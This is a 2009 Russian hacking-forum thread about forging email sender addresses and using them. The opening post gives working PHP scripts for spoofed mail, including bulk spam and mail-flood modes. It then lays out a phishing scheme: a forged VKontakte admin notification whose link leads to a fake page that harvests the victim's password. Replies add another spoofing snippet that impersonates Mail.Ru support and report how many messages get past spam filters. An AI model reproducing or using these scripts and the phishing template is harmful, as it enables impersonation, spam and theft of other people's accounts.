Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
"Подделываем" почту и приминяем на практике |
03.01.2009, 23:48
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
"Подделываем" почту и приминяем на практике
Моя первая статья ... строго не судите
Intro
Я хочу рассказать вам о замене исходящего адреса в e-mail и его практическом применении
Вы можете отправить письмо своему другу от billi@microsoft.com и сказать, что взломали сервер майкрософта.
Но есть и более "вкусные" применения ... Code
В гугле всегда можно отыскать то, что нам нужно, в данном случае это готовый скрипт (автора NOmeR1) отправки писем с подменой адреса отправителя
PHP код:
<?
/*
(C) NOmeR1
*/
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<?
//
error_reporting (0);
if(!set_time_limit(0)) {
$limit = false;
} else {
set_time_limit(0);
ignore_user_abort(1);
$limit = true;
}
$log = 'log.txt'; // Файл лога
ini_set('max_execution_time', '0');
?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo('<font color=Red>Off</font> (Время работы ограничено текущими настройками сервера)');?><br>
<?
$ip = getenv('REMOTE_ADDR');
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{
$_POST['to'] = stripslashes($_POST['to']);
$_POST['msg'] = stripslashes($_POST['msg']);
$_POST['from'] = stripslashes($_POST['from']);
$_POST['subject'] = stripslashes($_POST['subject']);
if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";
$headers .= "From: ".$_POST['from']."\n";
if($_GET['mail'] == '1')
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
}
elseif($_GET['mail'] == '2')
{
$_POST['to'] = explode("\n",$_POST['to']);
foreach($_POST['to'] as $poluchatels)
{
mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
}
}
elseif($_GET['mail'] == '3')
{
if(preg_match('/[0-9]+/',$_POST['kol']))
{
for($i=0;$i<$_POST['kol'];$i++)
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
sleep(1);
}
}
else
{
echo('Неверно введено (или не введено) кол-во сообщений');
}
}
$f = fopen($log,'a');
fwrite($f,'Отправелено сообщение &'.$_POST['msg'].'& с темой "'.$_POST['subject'].'" для "'.$_POST['to'].'" с IP - "'.$ip."\"\r\n");
fclose($f);
echo('<center><b><font color="green">Сообщение успешно отправлено</font></b></center>');
}
else
{
?>
<form style="width:350px" method='post'>
<?
if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo("Получатель <input type='text'name='to'><br>");
}
?>
Отправитель <input type='text' name='from'><br>
Тема сообщ. <input type='text' name='subject'><br>
<?
if($_GET['mail'] == '3')
{
echo("Кол-во сообщений <input type='text' name='kol'><br>");
}
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<?
if($_GET['mail'] == '2')
{
echo("Получатели<br><textarea name='to' rows='10' cols='30'>admin@admin.ru
admin@mail.ru
tiger@ya.ru</textarea>");
}
?>
<br>Сообщение<br>
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<?
}
} else {
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Отправить простое сообщение</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Наспамить</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Налудить</a><br>
<?
}
?>
- Загружаем скрипт на сервер с поддержкой .php
- Заполняем поля: Отправитель,Получатель,Тем а,Сообщение
- и всё
----------------------------------------------------------------------
Ну конечно лёгким путём мы не пойдём и напишем свой скрипт (файл class.phpmailer.php можно скачать тут или тут)
PHP код:
<?php
require('class.phpmailer.php');
$messag='Привет!';
$to = 'Admin@antichat.ru';
$subject = 'Как дела ?'; // Тема письма
$from_name='Админ_гугла'; // От кого (Имя)
$from_email='admin@google.ru'; // От кого (e-mail)
$mail = new PHPMailer();
$mail->From = $from_email;
$mail->FromName = $from_name ;
$mail->AddAddress($to, $to_adres);
$mail->IsHTML(true); // Вид письма (HTML)
$mail->Subject = $subject;
$mail->Body = $messag;
if ($mail->Send())
{
$res = 'Отослали';
}
else
{
$res = 'Ошибка';
echo 'Mailer Error: '.$mail->ErrorInfo;
}
echo $res;
?>
Приминение
Кидалы иногда используют данный метод при продаже почты либо после якобы взлома (тоесть вы заказываете взлом e-mail и в качестве доказательства вам присылают письмо с как будто бы взломленной почты)
Но подмена адреса может понадобится и простому " СИ инженеру"
Есть такой замечательный (хотя может и нет) сервис Vkontakte.ru
Допустим мы хотим узнать пароль челвека. Для начала нужно узнать его E-mail (Настоящему СИ инженеру пара пустяков  ) дальше с помощью нашего скрипта отправляем письмо на почту жертве (от ВКонтакте.ру <admin@vkontakte.ru> )
Код:
/*Полное имя жертвы*/,
Павел Дуров оставил комментарий к Вашей фотографии.
http://www.фейк.ru/photos.php=act&id=12374904_113674884
С уважением,
Администрация ВКонтакте.ру
_____
Вы можете поменять настройки e-mail оповещений на странице:
http://vkontakte.ru/settings.php?act=notify
И если "жертва" клюнула, пароль у вас
Естественно можно тоже самое делать с другими сайтами
Желаю всем удачи и С Новым Годом = )
|
|
|
04.01.2009, 00:04
|
|
Участник форума
Регистрация: 08.03.2007
Сообщений: 191
Провел на форуме:
4081574
Репутация:
214
|
|
с новым годом!
// я обычно не хожу по ссылкам от вконтакте , только если активация , потому что мне проще на свою стену зайти и прочесть :] и таких сообщений , что кто-то оставил сообщение много приходит , но этот метод наверно не плох , ++ поставил .
Последний раз редактировалось dimhee; 04.01.2009 в 00:11..
|
|
|
|
04.01.2009, 00:32
|
|
Познающий
Регистрация: 30.12.2007
Сообщений: 52
Провел на форуме:
375217
Репутация:
2
|
|
+++++, хорошая штука для розыграшей ))) Помню как прикалывался со своим другом, мда... весело было!
|
|
|
|
04.01.2009, 00:41
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Мало кто из простых юзеров знает, кто такой Павел Дуров  |
|
|
|
04.01.2009, 01:14
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810
Репутация:
56
|
|
28 строчек не считая кодеса это не статья.
|
|
|
|
04.01.2009, 01:15
|
|
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346
Репутация:
719
|
|
скрипт от Номер1 давно уже не работает вроде. ну по крайней мере у меня с шелла не слал на мэйл.ру
|
|
|
|
04.01.2009, 02:13
|
|
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294
Репутация:
416
|
|
самый простой и 100% работающий скрипт
Код:
<?php
$from = 'Администрация Mail.Ru suppоrt@corp.mail.ru>';
$subject = 'Тема письма';
$body = 'Бла-бла-бла, хтмл тэги кстати тоже пашут';
$header = "From: ".$from."\r\nContent-type: text/html";
mail('vasya@mail.ru', $subject, $body, $header);
?>
|
|
|
|
04.01.2009, 02:40
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 804
Провел на форуме:
4861890
Репутация:
1400
|
|
+++ неплохо
Сообщение от iddqd
Мало кто из простых юзеров знает, кто такой Павел Дуров
согласен.. всем уже лень посмотреть вниз и прочитать автора проекта=) |
|
|
|
04.01.2009, 02:54
|
|
Новичок
Регистрация: 28.03.2006
Сообщений: 22
Провел на форуме:
214622
Репутация:
13
|
|
Такое письмо легко палится в служебных заголовках + почтовики с антиспам системами подобный фейк не пропустят.
|
|
|
|
04.01.2009, 12:02
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Сообщение от iddqd
Мало кто из простых юзеров знает, кто такой Павел Дуров Павел Дуров просто как пример, что мешает написать вместо него лучшего друга "жертвы"
Сообщение от P3L3NG
скрипт от Номер1 давно уже не работает вроде. ну по крайней мере у меня с шелла не слал на мэйл.ру
На mail.ru шлёт
Сообщение от Kalashmat
Такое письмо легко палится в служебных заголовках + почтовики с антиспам системами подобный фейк не пропустят.
На rambler.ru из ~10 писем доходит 2-3
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
